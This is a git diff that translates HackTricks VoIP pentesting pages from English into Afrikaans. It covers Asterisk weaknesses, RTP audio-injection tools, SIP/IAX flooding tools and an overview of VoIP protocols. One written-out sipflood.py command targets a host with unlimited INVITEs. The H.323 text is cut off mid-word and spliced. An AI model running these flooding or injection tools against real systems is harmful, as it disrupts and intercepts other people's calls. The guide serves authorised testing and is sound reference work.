-  * **`Elastix.conf`** -> Contains several passwords in clear text like mysql root pass, IMAPd pass, web admin pass
-* **Several folders** will belong to the compromised asterisk user (if not running as root). This user can read the previous files and also controls the configuration, so he could make Asterisk to load other backdoored binaries when executed.
+* **`Elastix.conf`** -> Bevat verskeie wagwoorde in duidelike teks, soos mysql root-wagwoord, IMAPd-wagwoord, web-admin-wagwoord
+* **Verskeie lêers** sal aan die gekompromitteerde asterisk-gebruiker behoort (as dit nie as root uitgevoer word nie). Hierdie gebruiker kan die vorige lêers lees en beheer ook die konfigurasie, sodat hy Asterisk kan dwing om ander agterdeur-binêre lêers te laai wanneer dit uitgevoer word.
 
-### RTP Injection
+### RTP-injeksie
 
-It's possible to insert a **`.wav`** in converstions using tools such as **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) and **`rtpmixsound`** (`sudo apt install rtpmixsound`).
+Dit is moontlik om 'n **`.wav`** in gesprekke in te voeg deur gebruik te maak van hulpmiddels soos **`rtpinsertsound`** (`sudo apt install rtpinsertsound`) en **`rtpmixsound`** (`sudo apt install rtpmixsound`).
 
-Or you could use the scripts from [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) to **scan conversations** (**`rtpscan.pl`**), send a `.wav` to a conversation (**`rtpsend.pl`**) and **insert noise** in a conversation (**`rtpflood.pl`**).
+Of jy kan die skripsies van [http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/](http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/) gebruik om gesprekke te **skandeer** (**`rtpscan.pl`**), 'n `.wav` na 'n gesprek te stuur (**`rtpsend.pl`**) en geraas in 'n gesprek in te voeg (**`rtpflood.pl`**).
 
 ### DoS
 
-There are several ways to try to achieve DoS in VoIP servers.
+Daar is verskeie maniere om DoS in VoIP-bedieners te probeer bereik.
 
-* **`sipflood.py`** from [**sippts**](https://github.com/Pepelux/sippts)**: **_**SipFlood**_ sends unlimited messages to the target
-  * `python3 sipflood.py -i 10.10.0.10 -r 5080 -m invite -v`
-* [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX protocol used by Asterisk
-* [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
-* [**rtpflood**](https://www.kali.org/tools/rtpflood/): Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).
-* [**SIPp**](https://github.com/SIPp/sipp): Allows to analyze and generate SIP traffic. so it can be used to DoS also.
-* [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP swiss army knife. Can also be used to perform SIP attacks.
+* **`sipflood.py`** van [**sippts**](https://github.com/Pepelux/sippts)**: **_**SipFlood**_ stuur onbeperkte boodskappe na die teiken
+* `python3 sipflood.py -i 10.10.0.10 -r 5080 -m invite -v`
+* [**IAXFlooder**](https://www.kali.org/tools/iaxflood/): DoS IAX-protokol wat deur Asterisk gebruik word
+* [**inviteflood**](https://github.com/foreni-packages/inviteflood/blob/master/inviteflood/Readme.txt): 'n Hulpmiddel om SIP/SDP INVITE-boodskappe oor UDP/IP te oorstroming.
+* [**rtpflood**](https://www.kali.org/tools/rtpflood/): Stuur verskeie korrek geformuleerde RTP-pakkies. Dit is nodig om die RTP-poorte wat gebruik word, te ken (snuffel eers).
+* [**SIPp**](https://github.com/SIPp/sipp): Maak dit moontlik om SIP-verkeer te analiseer en te genereer. Dit kan ook gebruik word vir DoS.
+* [**SIPsak**](https://github.com/nils-ohlmeier/sipsak): SIP Swiss Army Knife. Kan ook gebruik word vir SIP-aanvalle.
 * Fuzzers: [**protos-sip**](https://www.kali.org/tools/protos-sip/), [**voiper**](https://github.com/gremwell/voiper).
-* **`sipsend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** SIPSend allow us to send a **customized SIP message** and analyze the response.
-* **`wssend.py`** from [**sippts**](https://github.com/Pepelux/sippts)**:** WsSend allow us to send a customized SIP message over WebSockets and analyze the response.
+* **`sipsend.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** SIPSend stel ons in staat om 'n **aangepaste SIP-boodskap** te stuur en die respons te analiseer.
+* **`wssend.py`** van [**sippts**](https://github.com/Pepelux/sippts)**:** WsSend stel ons in staat om 'n aangepaste SIP-boodskap oor WebSockets te stuur en die respons te analiseer.
 
-### OS Vulnerabilities
+### Bedryfstelselkwesbaarhede
 
-The easiest way to install a software such as Asterisk is to download an **OS distribution** that has it already installed, such as: **FreePBX, Elastix, Trixbox**... The problem with those is that once it's working sysadmins might **not update them again** and **vulnerabilities** are going to be discovered with time.
+Die maklikste manier om sagteware soos Asterisk te installeer, is om 'n bedryfstelselverspreiding af te laai wat dit reeds geïnstalleer het, soos: **FreePBX, Elastix, Trixbox**... Die probleem met hierdie verspreidings is dat sodra dit werk, stelseladministrateurs dit dalk **nie weer opdateer nie** en **kwesbaarhede** met tyd ontdek sal word.
 
-## References
+## Verwysings
 
 * [https://github.com/Pepelux/sippts/wiki](https://github.com/Pepelux/sippts/wiki)
 * [http://blog.pepelux.org/](http://blog.pepelux.org/)
@@ -566,14 +508,14 @@ The easiest way to install a software such as Asterisk is to download an **OS di
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks in PDF aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
index c7bbe127d..3396027f5 100644
--- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
+++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
@@ -1,24 +1,24 @@
-# Basic VoIP Protocols
+# Basiese VoIP-protokolle
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

 
-## Signaling Protocols
+## Seinprotokolle
 
 ### SIP (Session Initiation Protocol)
 
-This is the industry standard, for more information check:
+Dit is die bedryfsstandaard, vir meer inligting kyk:
 
 {% content-ref url="sip-session-initiation-protocol.md" %}
 [sip-session-initiation-protocol.md](sip-session-initiation-protocol.md)
@@ -26,96 +26,81 @@ This is the industry standard, for more information check:
 
 ### MGCP (Media Gateway Control Protocol)
 
-MGCP (Media Gateway Control Protocol) is a **signaling** and **call** **control protocol** outlined in RFC 3435. It operates in a centralized architecture, which consists of three main components:
+MGCP (Media Gateway Control Protocol) is 'n **sein-** en **oproepbeheerprotokol** wat in RFC 3435 uiteengesit word. Dit werk in 'n gesentraliseerde argitektuur, wat uit drie hoofkomponente bestaan:
 
-1. **Call Agent or Media Gateway Controller (MGC)**: The master gateway in the MGCP architecture is responsible for **managing and controlling the media gateways**. It handles call setup, modification, and termination processes. The MGC communicates with the media gateways using the MGCP protocol.
-2. **Media Gateways (MGs) or Slave Gateways**: These devices **convert digital media streams between different networks**, such as traditional circuit-switched telephony and packet-switched IP networks. They are managed by the MGC and execute commands received from it. Media gateways may include functions like transcoding, packetization, and echo cancellation.
-3. **Signaling Gateways (SGs)**: These gateways are responsible for **converting signaling messages between different networks**, enabling seamless communication between traditional telephony systems (e.g., SS7) and IP-based networks (e.g., SIP or H.323). Signaling gateways are crucial for interoperability and ensuring that call control information is properly communicated between the different networks.
+1. **Oproepagent of Media Gateway Controller (MGC)**: Die meesterpoort in die MGCP-argitektuur is verantwoordelik vir die **bestuur en beheer van die mediapoorte**. Dit hanteer oproepopstelling, wysiging en beëindigingsprosesse. Die MGC kommunikeer met die mediapoorte deur middel van die MGCP-protokol.
+2. **Mediapoorte (MG's) of Slave-poorte**: Hierdie toestelle **omskakel digitale mediastrome tussen verskillende netwerke**, soos tradisionele skakelstelseltelefonie en pakketskakel-IP-netwerke. Hulle word deur die MGC bestuur en voer opdragte uit wat van dit ontvang is. Mediapoorte kan funksies soos transkodering, pakketisering en egokansellasie insluit.
+3. **Seinpoorte (SG's)**: Hierdie poorte is verantwoordelik vir die **omskakeling van seinboodskappe tussen verskillende netwerke**, wat naadlose kommunikasie tussen tradisionele telefoonstelsels (bv. SS7) en IP-gebaseerde netwerke (bv. SIP of H.323) moontlik maak. Seinpoorte is noodsaaklik vir interoperabiliteit en verseker dat oproepbeheerinligting behoorlik tussen die verskillende netwerke gekommunikeer word.
 
-In summary, MGCP centralizes the call control logic in the call agent, which simplifies the management of media and signaling gateways, providing better scalability, reliability, and efficiency in telecommunication networks.
+Kortliks, MGCP sentraliseer die oproepbeheerlogika in die oproepagent, wat die bestuur van mediapoorte en seinpoorte vereenvoudig en beter skaalbaarheid, betroubaarheid en doeltreffendheid in telekommunikasienetwerke bied.
 
 ### SCCP (Skinny Client Control Protocol)
 
-Skinny Client Control Protocol (SCCP) is a **proprietary signaling and call control protocol** owned by Cisco Systems. It is primarily **used** for communication between **Cisco Unified Communications Manager** (formerly known as CallManager) and Cisco IP phones or other Cisco voice and video endpoints.
+Skinny Client Control Protocol (SCCP) is 'n **eiendomsregtelike sein- en oproepbeheerprotokol** wat deur Cisco Systems besit word. Dit word hoofsaaklik **gebruik** vir kommunikasie tussen **Cisco Unified Communications Manager** (voorheen bekend as CallManager) en Cisco IP-telefone of ander Cisco-klank- en videopunte.
 
-SCCP is a lightweight protocol that simplifies the communication between the call control server and the endpoint devices. It is referred to as "Skinny" because of its minimalistic design and reduced bandwidth requirements compared to other VoIP protocols like H.323 or SIP.
+SCCP is 'n ligte protokol wat die kommunikasie tussen die oproepbeheerbediener en die eindpunttoestelle vereenvoudig. Dit word as "Skinny" verwys vanweë sy minimalistiese ontwerp en verminderde bandwydtevereistes in vergelyking met ander VoIP-protokolle soos H.323 of SIP.
 
-The main components of an SCCP-based system are:
+Die belangrikste komponente van 'n SCCP-gebaseerde stelsel is:
 
-1. **Call Control Server**: This server, typically a Cisco Unified Communications Manager, manages the call setup, modification, and termination processes, as well as other telephony features such as call forwarding, call transfer, and call hold.
-2. **SCCP Endpoints**: These are devices such as IP phones, video conferencing units, or other Cisco voice and video endpoints that use SCCP to communicate with the call control server. They register with the server, send and receive signaling messages, and follow the instructions provided by the call control server for call handling.
-3. **Gateways**: These devices, such as voice gateways or media gateways, are responsible for converting media streams between different networks, like traditional circuit-switched telephony and packet-switched IP networks. They may also include additional functionality, such as transcoding or echo cancellation.
+1. **Oproepbeheerbediener**: Hierdie bediener, tipies 'n Cisco Unified Communications Manager, bestuur die oproepopstelling, wysiging en beëindigingsprosesse, sowel as ander telefoniekenmerke soos oproepstuur, oproepoordrag en oproephou. 
+2. **SCCP-eindpunte**: Dit is toestelle soos IP-telefone, videovergaderingseenhede of ander Cisco-klank- en videopunte wat SCCP gebruik om met die oproepbeheerbediener te kommunikeer. Hulle registreer by die bediener, stuur en ontvang seinboodskappe, en volg die instruksies wat deur die oproepbeheerbediener vir oproephantering verskaf word.
+3. **Poorte**: Hierdie toestelle, soos klankpoorte of mediapoorte, is verantwoordelik vir die omskakeling van mediastrome tussen verskillende netwerke, soos tradisionele skakelstelseltelefonie en pakketskakel-IP-netwerke. Hulle kan ook bykomende funksionaliteit insluit, soos transkodering of egokansellasie.
 
-SCCP offers a simple and efficient communication method between Cisco call control servers and endpoint devices. However, it is worth noting that **SCCP is a proprietary protocol**, which can limit interoperability with non-Cisco systems. In such cases, other standard VoIP protocols like SIP may be more suitable.
+SCCP bied 'n eenvoudige en doeltreffende kommunikasiemetode tussen Cisco-ooproepbeheerbedieners en eindpunttoestelle. Dit is egter die moeite werd om op te let dat **SCCP 'n eiendomsregtelike protokol** is, wat die interoperabiliteit met nie-Cisco-stelsels kan beperk. In sulke gevalle kan ander standaard VoIP-protokolle soos SIP meer geskik wees.
 
 ### H.323
 
-H.323 is a **suite of protocols** for multimedia communication, including voice, video, and data conferencing over packet-switched networks, such as IP-based networks. It was developed by the **International Telecommunication Union** (ITU-T) and provides a comprehensive framework for managing multimedia communication sessions.
+H.323 is 'n **reeks protokolle** vir multimedia kommunikasie, insluitend klank, video en datakonferensies oor pakketskakelnetwerke, soos IP-gebaseerde netwerke. Dit is ontwikkel deur die **International Telecommunication Union** (ITU-T) en bied 'n omvattende raamwerk vir die bestuur van multimedia kommunikasiesessies.
 
-Some key components of the H.323 suite include:
+Sommige sleutelkomponente van die H.323-reeks sluit in:
 
-1. **Terminals**: These are endpoint devices, such as IP phones, video conferencing systems, or software applications, that support H.323 and can participate in multimedia communication sessions.
-2. **Gateways**: These devices convert media streams between different networks, like traditional circuit-switched telephony and packet-switched IP networks, enabling interoperability between H.323 and other communication systems. They may also include additional functionality, such as transcoding or echo cancellation.
-3. **Gatekeepers**: These are optional components that provide call control and management services in an H.323 network. They perform functions such as address translation, bandwidth management, and admission control, helping to manage and optimize network resources.
-4. **Multipoint Control Units (MCUs)**: These devices facilitate multipoint conferences by managing and mixing media streams from multiple endpoints. MCUs enable features such as video layout control, voice-activated switching, and continuous presence, making it possible to host large-scale conferences with multiple participants.
+1. **Terminale**: Dit is eindpunttoestelle, soos IP-telefone, videovergaderingstelsels of sagtewaretoepassings, wat H.323 ondersteun en kan deelneem aan multimedia kommunikasiesessies.
+2. **Poorte**: Hierdie toestelle omskakel mediastrome tussen verskillende netwerke, soos tradisionele skakelstelseltelefonie en pakketskakel-IP-netwerke, en maak interoperabiliteit tussen H.323 en ander kommunikasiestelsels moontlik. Hulle kan ook bykomende funksionaliteit insluit, soos transkodering of egokansellasie.
+3. **Poortbeheerders**: Dit is opsionele komponente wat oproepbeheer- en bestuursdienste in 'n H.323-netwerk voorsien. Hulle voer funksies uit soos adresvertaling, bandwydtebestuur en toelatingsbeheer, wat help om netwerkbronne te bestuur en te optimaliseer.
+4. **Multipuntbeheereenhede (MCUs)**: Hierdie toestelle fasiliteer multipunt-konferensies deur mediastrome vanaf verskeie eindpunte te bestuur en te meng. MCUs maak funksies soos video-uitlegbeheer, stemgeaktiveerde skakeling en voortdurende teenwoordigheid moontlik, wat dit moontlik maak om grootskaalse konferensies met verskeie deelnemers aan te bied.
 
-H.323 supports a range of audio and video codecs, as well as other supplementary services like call forwarding, call transfer, call hold, and call waiting. Despite its widespread adoption in the early days of VoIP, H.323 has been gradually replaced by more modern and flexible protocols like the **Session Initiation Protocol (SIP)**, which offers better interoperability and easier implementation. However, H.323 remains in use in many legacy systems and continues to be supported by various equipment vendors.
+H.323 ondersteun 'n verskeidenheid klank- en videokodeks, sowel as ander aanvullende dienste soos oproepstuur, o
+## Oordrag- en Vervoerprotokolle
 
-### IAX (Inter Asterisk eXchange)
+### SDP (Sessiebeskrywingsprotokol)
 
-IAX (Inter-Asterisk eXchange) is a **signaling and call control protocol** primarily used for communication between Asterisk PBX (Private Branch Exchange) servers and other VoIP devices. It was developed by Mark Spencer, the creator of the Asterisk open-source PBX software, as an alternative to other VoIP protocols like SIP and H.323.
+SDP (Sessiebeskrywingsprotokol) is 'n **teksgebaseerde formaat** wat gebruik word om die kenmerke van multimedia-sessies, soos spraak, video of datakonferensies, oor IP-netwerke te beskryf. Dit is ontwikkel deur die **Internet Engineering Task Force (IETF)** en word gedefinieer in **RFC 4566**. SDP hanteer nie die werklike media-oordrag of sessie-opstelling nie, maar word saam met ander seinprotokolle, soos **SIP (Sessie-inisiasieprotokol)**, gebruik om te onderhandel en inligting oor die media-strome en hul eienskappe uit te ruil.
 
-IAX is known for its **simplicity, efficiency, and ease of implementation**. Some key features of IAX include:
+Sommige sleutellemente van SDP sluit in:
 
-1. **Single UDP Port**: IAX uses a single UDP port (4569) for both signaling and media traffic, which simplifies firewall and NAT traversal, making it easier to deploy in various network environments.
-2. **Binary Protocol**: Unlike text-based protocols like SIP, IAX is a binary protocol, which reduces its bandwidth consumption and makes it more efficient for transmitting signaling and media data.
-3. **Trunking**: IAX supports trunking, which allows multiple calls to be combined into a single network connection, reducing overhead and improving bandwidth utilization.
-4. **Native Encryption**: IAX has built-in support for encryption, using methods like RSA for key exchange and AES for media encryption, providing secure communication between endpoints.
-5. **Peer-to-Peer Communication**: IAX can be used for direct communication between endpoints without the need for a central server, enabling simpler and more efficient call routing.
+1. **Sessie-inligting**: SDP beskryf die besonderhede van 'n multimedia-sessie, insluitend sessienaam, sessiebeskrywing, begin- en eindtyd.
+2. **Media-strome**: SDP definieer die eienskappe van media-strome, soos die media-tipe (klank, video of teks), vervoerprotokol (bv. RTP of SRTP) en die media-formaat (bv. kodekinligting).
+3. **Verbindingsinligting**: SDP verskaf inligting oor die netwerkadres (IP-adres) en poortnommer waar die media gestuur of ontvang moet word.
+4. **Eienskappe**: SDP ondersteun die gebruik van eienskappe om addisionele, opsionele inligting oor 'n sessie of media-stroom te verskaf. Eienskappe kan gebruik word om verskillende kenmerke soos enkripsiesleutels, bandwydtevereistes of media-beheermeganismes te spesifiseer.
 
-Despite its benefits, IAX has some limitations, such as its primary focus on the Asterisk ecosystem and less widespread adoption compared to more established protocols like SIP. As a result, IAX might not be the best choice for interoperability with non-Asterisk systems or devices. However, for those working within the Asterisk environment, IAX offers a robust and efficient solution for VoIP communication.
+SDP word tipies gebruik in die volgende proses:
 
-## Transmission & Transport Protocols
+1. 'n Inisieerende party skep 'n SDP-beskrywing van die voorgestelde multimedia-sessie, insluitend die besonderhede van die media-strome en hul eienskappe.
+2. Die SDP-beskrywing word na die ontvangende party gestuur, gewoonlik ingebed binne 'n seinprotokolboodskap soos SIP of RTSP.
+3. Die ontvangende party verwerk die SDP-beskrywing en, gebaseer op sy vermoëns, kan dit die voorgestelde sessie aanvaar, verwerp of wysig.
+4. Die finale SDP-beskrywing word as deel van die seinprotokolboodskap teruggestuur na die inisieerende party, wat die onderhandelingsproses voltooi.
 
-### SDP (Session Description Protocol)
-
-SDP (Session Description Protocol) is a **text-based format** used to describe the characteristics of multimedia sessions, such as voice, video, or data conferencing, over IP networks. It was developed by the **Internet Engineering Task Force (IETF)** and is defined in **RFC 4566**. SDP does not handle the actual media transmission or session establishment but is used in conjunction with other signaling protocols, like **SIP (Session Initiation Protocol)**, to negotiate and exchange information about the media streams and their attributes.
-
-Some key elements of SDP include:
-
-1. **Session Information**: SDP describes the details of a multimedia session, including session name, session description, start time, and end time.
-2. **Media Streams**: SDP defines the characteristics of media streams, such as the media type (audio, video, or text), transport protocol (e.g., RTP or SRTP), and the media format (e.g., codec information).
-3. **Connection Information**: SDP provides information about the network address (IP address) and port number where the media should be sent or received.
-4. **Attributes**: SDP supports the use of attributes to provide additional, optional information about a session or media stream. Attributes can be used for specifying various features like encryption keys, bandwidth requirements, or media control mechanisms.
-
-SDP is typically used in the following process:
-
-1. An initiating party creates an SDP description of the proposed multimedia session, including the details of the media streams and their attributes.
-2. The SDP description is sent to the receiving party, usually embedded within a signaling protocol message like SIP or RTSP.
-3. The receiving party processes the SDP description, and based on its capabilities, it may accept, reject, or modify the proposed session.
-4. The final SDP description is sent back to the initiating party as part of the signaling protocol message, completing the negotiation process.
-
-SDP's simplicity and flexibility make it a widely adopted standard for describing multimedia sessions in various communication systems, playing a crucial role in establishing and managing real-time multimedia sessions over IP networks.
+SDP se eenvoud en buigsaamheid maak dit 'n wyd aangeneemde standaard vir die beskrywing van multimedia-sessies in verskillende kommunikasiestelsels, en speel 'n belangrike rol in die vestiging en bestuur van regstreekse multimedia-sessies oor IP-netwerke.
 
 ### RTP / RTCP / SRTP / ZRTP
 
-1. **RTP (Real-time Transport Protocol)**: RTP is a network protocol designed for the delivery of audio and video data, or other real-time media, over IP networks. Developed by the **IETF** and defined in **RFC 3550**, RTP is commonly used with signaling protocols like SIP and H.323 to enable multimedia communication. RTP provides mechanisms for **synchronization**, **sequencing**, and **timestamping** of media streams, helping to ensure smooth and timely media playback.
-2. **RTCP (Real-time Transport Control Protocol)**: RTCP is a companion protocol to RTP, used for monitoring the quality of service (QoS) and providing feedback on the transmission of media streams. Defined in the same **RFC 3550** as RTP, RTCP **periodically exchanges control packets between participants in an RTP session**. It shares information such as packet loss, jitter, and round-trip time, which helps in diagnosing and adapting to network conditions, improving overall media quality.
-3. **SRTP (Secure Real-time Transport Protocol)**: SRTP is an extension of RTP that provides **encryption**, **message authentication**, and **replay protection** for media streams, ensuring secure transmission of sensitive audio and video data. Defined in **RFC 3711**, SRTP uses cryptographic algorithms like AES for encryption and HMAC-SHA1 for message authentication. SRTP is often used in combination with secure signaling protocols like SIP over TLS to provide end-to-end security in multimedia communication.
-4. **ZRTP (Zimmermann Real-time Transport Protocol)**: ZRTP is a cryptographic key-agreement protocol that provides **end-to-end encryption** for RTP media streams. Developed by Phil Zimmermann, the creator of PGP, ZRTP is described in **RFC 6189**. Unlike SRTP, which relies on signaling protocols for key exchange, ZRTP is designed to work independently of the signaling protocol. It uses **Diffie-Hellman key exchange** to establish a shared secret between the communicating parties, without requiring prior trust or a public key infrastructure (PKI). ZRTP also includes features like **Short Authentication Strings (SAS)** to protect against man-in-the-middle attacks.
+1. **RTP (Regstreekse Vervoerprotokol)**: RTP is 'n netwerkprotokol wat ontwerp is vir die aflewering van klank- en videodata, of ander regstreekse media, oor IP-netwerke. Ontwikkel deur die **IETF** en gedefinieer in **RFC 3550**, word RTP gewoonlik saam met seinprotokolle soos SIP en H.323 gebruik om multimedia-kommunikasie moontlik te maak. RTP bied meganismes vir **sinsrondering**, **volgordebepaling** en **tydstempeling** van media-strome, wat help om vlot en tydige media-afspeling te verseker.
+2. **RTCP (Regstreekse Vervoerbeheerprotokol)**: RTCP is 'n metgeselprotokol vir RTP wat gebruik word vir die monitering van diensgehalte (QoS) en die voorsiening van terugvoer oor die oordrag van media-strome. Gedefinieer in dieselfde **RFC 3550** as RTP, **ruil RTCP periodiek beheerpakette uit tussen deelnemers in 'n RTP-sessie**. Dit deel inligting soos pakkieverlies, jitter en rondreistyd, wat help om netwerktoestande te diagnoseer en aan te pas, en die algehele mediakwaliteit te verbeter.
+3. **SRTP (Veilige Regstreekse Vervoerprotokol)**: SRTP is 'n uitbreiding van RTP wat **enkripsie**, **boodskapverifikasie** en **herhaalbeskerming** vir media-strome bied, om die veilige oordrag van sensitiewe klank- en videodata te verseker. Gedefinieer in **RFC 3711**, gebruik SRTP kriptografiese algoritmes soos AES vir enkripsie en HMAC-SHA1 vir boodskapverifikasie. SRTP word dikwels saam met veilige seinprotokolle soos SIP oor TLS gebruik om end-to-end-veiligheid in multimedia-kommunikasie te bied.
+4. **ZRTP (Zimmermann Regstreekse Vervoerprotokol)**: ZRTP is 'n kriptografiese sleutel-ooreenkomstige protokol wat **end-to-end enkripsie** vir RTP-media-strome bied. Ontwikkel deur Phil Zimmermann, die skepper van PGP, word ZRTP beskryf in **RFC 6189**. Anders as SRTP, wat afhanklik is van seinprotokolle vir sleuteluitruiling, is ZRTP ontwerp om onafhanklik van die seinprotokol te werk. Dit gebruik **Diffie-Hellman sleuteluitruiling** om 'n gedeelde geheim tussen die kommunikerende partye te vestig, sonder om vooraf vertroue of 'n openbare sleutel-infrastruktuur (PKI) te vereis. ZRTP sluit ook kenmerke soos **Kort Verifikasie-strings (SAS)** in om teen man-in-die-middelaanvalle te beskerm.
 
-These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks.
+Hierdie protokolle speel 'n essensiële rol in die **aflewering en beveiliging van regstreekse multimedia-kommunikasie oor IP-netwerke**. Terwyl RTP en RTCP die werklike media-oordrag en kwaliteitsmonitering hanteer, verseker SRTP en ZRTP dat die oorgedrae media beskerm is teen afluistering, manipulasie en herhaalaanvalle.
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

diff --git a/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md b/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
index 9ccc38dd3..e8c0c0f59 100644
--- a/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
+++ b/network-services-pentesting/pentesting-voip/basic-voip-protocols/sip-session-initiation-protocol.md
@@ -1,93 +1,59 @@
-# SIP (Session Initiation Protocol)
+# SIP (Sessie Inisiasie Protokol)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
